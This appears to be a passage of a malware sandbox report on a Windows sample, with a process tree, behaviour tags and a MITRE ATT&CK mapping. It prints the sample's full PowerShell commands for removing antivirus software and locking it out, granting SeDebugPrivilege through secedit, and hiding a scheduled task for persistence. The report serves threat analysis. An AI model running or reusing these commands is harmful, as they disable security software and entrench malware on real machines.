    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1980
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Hide Artifacts: Ignore Process Interrupts
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2032
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match 'ÌÚÑ¶µçÄÔ¹Ü¼Ò' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach TFsFlt $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Hide Artifacts: Ignore Process Interrupts
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2152
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Hide Artifacts: Ignore Process Interrupts
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1060
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '½ðÉ½¶¾°Ô' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach kisknl $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Hide Artifacts: Ignore Process Interrupts
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2584
- - C:\ProgramData\Data\un.exe
    "C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\Program\
    3⤵
    - Executes dropped EXE
    PID:1704
- - C:\ProgramData\Program\iusb3mon.exe
    "C:\ProgramData\Program\iusb3mon.exe" false
    3⤵
    - UAC bypass
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Identifies Wine through registry keys
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    - System policy modification
    PID:2228
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2268
    - - C:\Windows\SysWOW64\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2920
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Microsoft\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.*')) -Force;"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1696
    - - C:\Windows\SysWOW64\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log /quiet
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2944
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:556
    - - C:\Windows\SysWOW64\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:536
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:744
    - - C:\Windows\SysWOW64\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2908
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c echo.>c:\inst.ini
      4⤵
      System Location Discovery: System Language Discovery
      PID:2820
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      PID:1076
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      PID:1740
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
      4⤵
      Command and Scripting Interpreter: PowerShell
      Hide Artifacts: Ignore Process Interrupts
      System Location Discovery: System Language Discovery
      PID:1704
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder(ÏµÍ³ÒôÆµ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
      4⤵
      System Location Discovery: System Language Discovery
      PID:892
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "Windows Audio Endpoint Builder(ÏµÍ³ÒôÆµ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2684
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      PID:2648
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      PID:2804
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
      4⤵
      Command and Scripting Interpreter: PowerShell
      Hide Artifacts: Ignore Process Interrupts
      System Location Discovery: System Language Discovery
      PID:1452

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2420

C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000002A8" "00000000000005AC"
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Installer Packages

T1546.016

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Installer Packages

T1546.016

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Ignore Process Interrupts

T1564.011

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

System Binary Proxy Execution

T1218

Msiexec

T1218.007

Virtualization/Sandbox Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion